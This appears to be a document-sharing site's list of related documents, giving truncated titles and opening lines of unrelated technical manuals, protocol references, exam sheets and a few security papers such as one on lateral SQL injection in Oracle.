Applicable Models TSP100ECO TSP100GT TSP100LAN TSP100U/PUSB Rev. 5.5 Contents 1. Installation and Uninstallation... 1 1.1. Installing CD... 1 1.2. Adding a Printer (TSP100U/PU/GT/ECO)... 7 1.3. Adding
More informationRTX64. Supported Network Interface Cards IntervalZero, Inc. IZ-DOC-X R32 March 2017
RTX64 Supported Network Interface Cards 2017 IntervalZero, Inc. IZ-DOC-X64-0088-R32 March 2017 The Supported Network Interface Cards guide lists the NIC drivers that are provided with RTX64 for use with
More informationIEC /104 Communications Protocol
expertmeter High Performance Analyzer PM180 IEC60870-5-101/104 Communications Protocol Reference Guide BG0593 Rev. A1 Every effort has been made to ensure that the material herein is complete and accurate.
More information1CAPI INFORMATION VALUES. August Software Reference CAPI Information Values 1
1CAPI INFORMATION VALUES August 2000 Software Reference CAPI Information Values 1 2 CAPI Information Values Software Reference Table of Contents CAPI INFORMATION Table of Contents VALUES A REFERENCE 5
More informationDATA SHEET. article numbers P125-1b & P125-1g
LC 16.2 TREND DATA SHEET article numbers P125-1b & P125-1g Pottery House, Pottery Road, Dun Laoghaire, Co. Dublin, Ireland. Tel: +353-1-2350279 Fax: +353-1-2350361 Am Gneisenauflöz 6, 66538 Neunkirchen,
More information#include <stdio.h> // // Global CONSTANTS
Distance.c Author: Baylor Electromechanical Systems Operates on an external 18.432 MHz oscillator. Target: Cygnal Educational Development Board / C8051F020 Tool chain: KEIL C51 6.03 / KEIL EVAL C51 Utilizes
More informationCS 4400 Fall 2018 Midterm Exam 2 Practice (Version 2)
CS 4400 Fall 2018 Midterm Exam 2 Practice (Version 2) Name: Instructions You will have eighty minutes to complete the actual open-book, opennote exam. Electronic devices will be allowed only to consult
More informationANM071. Keypad decoding technique using TSC80251G1. 1. Description 2. TSC80251G Keyboard interrupt Power down mode
Keypad decoding technique using TSC80251G1 by François Fosse Technical Marketing Engineer Temic France 1. Description This application note demonstrates the use of a matrix keypad including wake up from
More informationADV7612 SOFTWARE MANUAL SOFTWARE MANUAL. Documentation of the Register Maps. Rev. A
ADV7612 SOFTWAE MANUAL Documentation of the egister Maps SOFTWAE MANUAL ev. A December 2013 TABLE OF CONTENTS egister Map Introduction... 3 Legal Terms and Conditions... 3 1 egister Tables... 4 1.1 IO...
More informationSXH Protocol by Spinel Version 3.0 Date:
SXH Protocol by Spinel Version 3.0 Date:.8 Revision History Vision Date Description V.0 V.0 V3.0 September, 6 December, 6 April, 8 Initial release Added LED control, OSD, Cmd 0x30 Added all ratio image
More informationECE251: Intro to Microprocessors Name: Solutions Mid Term Exam October 4, 2018
ECE251: Intro to Microprocessors Name: Solutions Mid Term Exam October 4, 2018 (PRINT) Instructions: No calculators, books, or cell phones; do not communicate with any other student. One side of a single
More informationHolistic Database Security
Holistic Database Security 1 Important Terms Exploit: Take advantage of a flaw or feature Attack Surface: Any node on the network that can be attacked. That can be the UI, People, anything that touches
More informationLateral SQL Injection Revisited
Lateral SQL Injection Revisited Exploiting NUMBERs Document Profile Version 1.0 Published 1/31/2012 Revision History Version Date Description 1.0 01/31/2012 Document published. Authors David Litchfield
More informationMahesh V. Tripunitara and Samuel S. Wagsta, Jr. COAST Laboratory. Purdue University. COAST TR-98/01.
The Compression Functions of SHA, MD, MD4 and MD5 are not Ane Mahesh V. Tripunitara and Samuel S. Wagsta, Jr. COAST Laboratory Purdue University West Lafayette, IN 47907-198 ftripunit,sswg@cs.purdue.edu
More informationTechnical Information. Command overview of Vision Systems
Technical Information Command overview of Vision Systems Image analysis command Grab image 0x01 X X X X Shutter speed 0x07 X X X X Synchronous flash 0x49 X X X X Video mode 0x00 X X Display 0x05 X X X
More informationFlexi Soft T E L E G R A M M L I S T I N G
T E L E G R A M M L I S T I N G This document is protected by the law of copyright, whereby all rights established therein remain with the company SICK AG. Reproduction of this document or parts of this
More informationPLC Lite Host Message Protocol Specification
PLC Lite Host Message Protocol Specification Version 0.6 Oct. 20, 2014 Copyright Texas Instruments Incorporated, 2009-2014 The information and/or drawings set forth in this document and all rights in and
More informationSecurity Considerations for SYS_REFCURSOR use in Oracle PL/SQL Applications. 1st July 2011 David Litchfield
Security Considerations for SYS_REFCURSOR use in Oracle PL/SQL Applications 1st July 2011 David Litchfield In databases, cursors can be considered as a handle to an SQL query and its result set. Oracle
More informationRTX64. Supported Network Interface Cards
RTX64 Supported Network Interface Cards 2016 IntervalZero, Inc. IZ-DOC-X64-0088-R31 November 2016 This document provides a listing of the NIC drivers that are provided with RTX64 for use with the RT-TCP/IP
More informationProtocol Description. thanos ModBus. thanos SR ModBus
Protocol Description thanos ModBus & thanos SR ModBus Thermokon Sensortechnik Gmb - www.thermokon.de - email@thermokon.de 1 Index of changes Revision Date Description A B C 25.7.211 First draft 12.9.211
More informationKINGSTAR 3.6. SUPPORTED NETWORK INTERFACE CARDS KS-DOC-x R20
KINGSTAR 3.6 SUPPORTED NETWORK INTERFACE CARDS KS-DOC-x64-0007-R20 Copyright 1996-2019 by All rights reserved. No part of this document may be reproduced or transmitted in any form or by any means, graphic,
More informationSGX SECURE ENCLAVES IN PRACTICE: SECURITY AND CRYPTO REVIEW
SUMMARY Our Black Hat 2016 talk SGX Secure Enclaves in Practice: Security and Crypto Review is the first public report about the security of Intel(R) Software Guard Extensions (SGX) based on actual SGX
More informationDeploying Cisco Service Provider Network Routing
SPROUTE Deploying Cisco Service Provider Network Routing Version 1.01 Lab Guide Text Part Number: 97-3149-02 Americas Headquarters Cisco Systems, Inc. San Jose, CA Asia Pacific Headquarters Cisco Systems
More informationReference Manual HexView. HexView. Reference Manual. Version Vector Informatik GmbH Version based on template version 5.1.
HexView Reference Manual Version 1.10.01 Authors Status Armin Happel Released 2016 Vector Informatik GmbH Version 1.10.01 1 Document Information History Author Date Version Remarks Vishp 2006-02-21 1.0
More informationSIRKOM'Digital'Signage'Div.''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''MedeaWiz 'Sprite' High'Definition'Video'Player' User'Manual'
. MedeaWiz Sprite HighDefinitionVideoPlayer UserManual FWversion20161229 Manualversion1.06 Notethatthismanualmaychangeperiodically Pleasegotowww.MedeaWiz.comforthelatestversion 0 P age . Table&of&Contents&
More informationSurvey. Motivation 29.5 / 40 class is required
Survey Motivation 29.5 / 40 class is required Concerns 6 / 40 not good at examination That s why we have 3 examinations 6 / 40 this class sounds difficult 8 / 40 understand the instructor Want class to
More informationPrimitive Specification for SSS Philip Hawkes, Michael Paddon, Gregory G. Rose, Miriam Wiggers de Vries
Primitive Specification for SSS Philip Hawkes, Michael Paddon, Gregory G. Rose, Miriam Wiggers de Vries {phawkes,mwp,ggr,miriamw}@qualcomm.com Qualcomm Australia Level 3, 230 Victoria Rd Gladesville NSW
More informationJPEG File Layout and Format
Page 1 of 6 JPEG File Layout and Format The File Layout A JPEG file is partitioned by markers. Each marker is immediately preceded by an all 1 byte (0xff). Although t more markers, We will discuss the
More informationAN198 I NTEGRATING SDCC 8051 TOOLS INTO THE SILICON LABS IDE. 4. Configure the Tool Chain Integration Dialog. 1. Introduction. 2.
I NTEGRATING SDCC 8051 TOOLS INTO THE SILICON LABS IDE 1. Introduction This application note describes how to integrate the SDCC 8051 Tools into the Silicon Laboratories IDE (Integrated Development Environment).
More informationGarmin Image (IMG) File Format. Herbert Oppmann
Garmin Image (IMG) File Format Herbert Oppmann herby@memotech.franken.de http://www.memotech.franken.de/fileformats/ 2018-01-01 Content Garmin Image (IMG) File Format...4 Basic data types...4 General file
More informationModbus Map: Conext MPPT Device
Modbus Map: Conext MPPT 60 150 Device 503-0248-01-01 Revision A.3 UNINTENDED OPERATION WARNING The use of this product with Modbus communications requires expertise in the design, operation, and programming
More informationModbus Map: MPPT60 Device
503-0248-01-01 Revision A.1 UNINTENDED OPERATION WARNING The use of this product with Modbus communications requires expertise in the design, operation, and programming of the device. Only qualified persons
More informationUniversity of Texas at El Paso Electrical and Computer Engineering Department
University of Texas at El Paso Electrical and Computer Engineering Department EE 3176 Laboratory for Microprocessors I Fall 2016 LAB 07 Flash Controller Goals: Bonus: Pre Lab Questions: Familiarize yourself
More information